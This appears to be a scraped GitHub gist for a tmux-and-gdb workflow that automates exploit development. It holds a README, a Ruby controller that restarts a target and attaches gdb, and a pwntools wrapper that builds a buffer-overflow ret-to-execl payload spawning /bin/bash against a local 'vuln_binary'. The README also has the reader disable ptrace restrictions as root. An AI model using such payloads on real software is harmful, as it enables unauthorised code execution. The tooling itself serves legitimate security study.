huyphan/README.md

## README.md

      
    Raw
  

              README.md
            
          
    Idea


Having a single script to automatically run the binary, attach gdb, re-set breakpoints every time you restart your debugging session.
The main idea is to run your debugging processes on different Tmux panes and let the controller script (also running on another tmux pane) send keystrokes to automate activities on those panes.

Prerequisites


tmux
If you run your tmux session as non-root user, the system configuration /proc/sys/kernel/yama/ptrace_scope should be set to 0 (i.e. running echo 0 > /proc/sys/kernel/yama/ptrace_scope as root) to allow attaching gdb to an existing process as non-root user.

Usage


Use controller.rb script as the template to orchestrate your debug/exploit development process. You need to execute it in the same tmux session where you plan to run your runner and gdb.
Update CONFIGURATIONS section of the script to match with your setup:
  * RUNNER: either the path to the binary being debugged or the wrapper script (see example).

BINARY_NAME: name of the binary being debugged, it is mainly used by pgrep to find the exact PID of running process.
RUNNER_TMUX_PANE and GDB_TMUX_PANE: the identities of tmux panes (in format of <window_index>.<pane_index> used for runnning binary and gdb respectively. In the current setup, they are running on the first panes of my first two tmux windows. You are free to organize the panes in your own way (e.g. two panes split vertically on the same window) and update these configurations accordingly.
GDB_STARTUP_COMMANDS: the set of commands you want to run after gdb starts.


## controller.rb
#! /usr/bin/env ruby

#### CONFIGURATIONS ####
RUNNER = "python /home/vagrant/host-share/wrapper.py"
BINARY_NAME = "vuln_binary"

RUNNER_TMUX_PANE = '1.1'  # Using pane #1 of tmux's window #1
GDB_TMUX_PANE = '2.1'     # Using pane #1 of tmux's window #2

GDB_STARTUP_COMMANDS = '
br *0x0804beef
br *0xdeadeef
c
'
#### END CONFIGURATIONS ####

# Get current window and pane index
current_pane = `tmux display-message -p '#I.#P'`.strip()
raise "Current pane (#{current_pane}) is prereserved, run this on another pane" if [RUNNER_TMUX_PANE, GDB_TMUX_PANE].include?(current_pane)

# Kill whatever running on the RUNNER_TMUX_PANE and GDB_TMUX_PANE
pid = `tmux list-panes -a -F "\#{window_index}.\#{pane_index} \#{pane_pid}" | grep '^#{RUNNER_TMUX_PANE}' | awk '{print $NF}'`
`pkill -SIGSTOP -P #{pid}`
`pkill -SIGKILL -P #{pid}`

pid = `tmux list-panes -a -F "\#{window_index}.\#{pane_index} \#{pane_pid}" | grep '^#{GDB_TMUX_PANE}' | awk '{print $NF}'`
`pkill -SIGSTOP -P #{pid}`
`pkill -SIGKILL -P #{pid}`

# Run the executable via wrapper script
`tmux send-keys -t '#{RUNNER_TMUX_PANE}' '#{RUNNER}' Enter`
sleep(1)

# Attach gdb to that process on GDB pane
pid = `pgrep -x #{BINARY_NAME}`
raise "Couldn't find process ID to attach" if pid.empty?
raise "There are more than one process IDs" unless pid.split("\n").length == 1

`tmux send-keys -t '#{GDB_TMUX_PANE}' 'gdb -p #{pid}' Enter`
GDB_STARTUP_COMMANDS.split("\n").reject(&:empty?).each { |command|
    `tmux send-keys -t '#{GDB_TMUX_PANE}' '#{command}' Enter`
}

## wrapper.py
from pwnlib.tubes.process import process

execl_addr = '\x08\x04\x86\xd0'
bin_bash_addr = '\x08\x04\x9c\xff'

payload = ""
payload += "A"*41
payload += execl_addr[::-1] # RET
payload += "B"*4            # fake RET
payload += bin_bash_addr[::-1]
payload += "\x00\x00\x00\x00"

p = process("./vuln_binary")
raw_input("Ready?")
print p.recv(timeout=0.01)
p.sendline("1")
print p.recv(timeout=0.01)
p.sendline("2")
	#! /usr/bin/env ruby

	#### CONFIGURATIONS ####
	RUNNER = "python /home/vagrant/host-share/wrapper.py"
	BINARY_NAME = "vuln_binary"

	RUNNER_TMUX_PANE = '1.1' # Using pane #1 of tmux's window #1
	GDB_TMUX_PANE = '2.1' # Using pane #1 of tmux's window #2

	GDB_STARTUP_COMMANDS = '
	br *0x0804beef
	br *0xdeadeef
	c
	'
	#### END CONFIGURATIONS ####

	# Get current window and pane index
	current_pane = `tmux display-message -p '#I.#P'`.strip()
	raise "Current pane (#{current_pane}) is prereserved, run this on another pane" if [RUNNER_TMUX_PANE, GDB_TMUX_PANE].include?(current_pane)

	# Kill whatever running on the RUNNER_TMUX_PANE and GDB_TMUX_PANE
	pid = `tmux list-panes -a -F "\#{window_index}.\#{pane_index} \#{pane_pid}" \| grep '^#{RUNNER_TMUX_PANE}' \| awk '{print $NF}'`
	`pkill -SIGSTOP -P #{pid}`
	`pkill -SIGKILL -P #{pid}`

	pid = `tmux list-panes -a -F "\#{window_index}.\#{pane_index} \#{pane_pid}" \| grep '^#{GDB_TMUX_PANE}' \| awk '{print $NF}'`
	`pkill -SIGSTOP -P #{pid}`
	`pkill -SIGKILL -P #{pid}`

	# Run the executable via wrapper script
	`tmux send-keys -t '#{RUNNER_TMUX_PANE}' '#{RUNNER}' Enter`
	sleep(1)

	# Attach gdb to that process on GDB pane
	pid = `pgrep -x #{BINARY_NAME}`
	raise "Couldn't find process ID to attach" if pid.empty?
	raise "There are more than one process IDs" unless pid.split("\n").length == 1

	`tmux send-keys -t '#{GDB_TMUX_PANE}' 'gdb -p #{pid}' Enter`
	GDB_STARTUP_COMMANDS.split("\n").reject(&:empty?).each { \|command\|
	`tmux send-keys -t '#{GDB_TMUX_PANE}' '#{command}' Enter`
	}
	from pwnlib.tubes.process import process

	execl_addr = '\x08\x04\x86\xd0'
	bin_bash_addr = '\x08\x04\x9c\xff'

	payload = ""
	payload += "A"*41
	payload += execl_addr[::-1] # RET
	payload += "B"*4 # fake RET
	payload += bin_bash_addr[::-1]
	payload += "\x00\x00\x00\x00"

	p = process("./vuln_binary")
	raw_input("Ready?")
	print p.recv(timeout=0.01)
	p.sendline("1")
	print p.recv(timeout=0.01)
	p.sendline("2")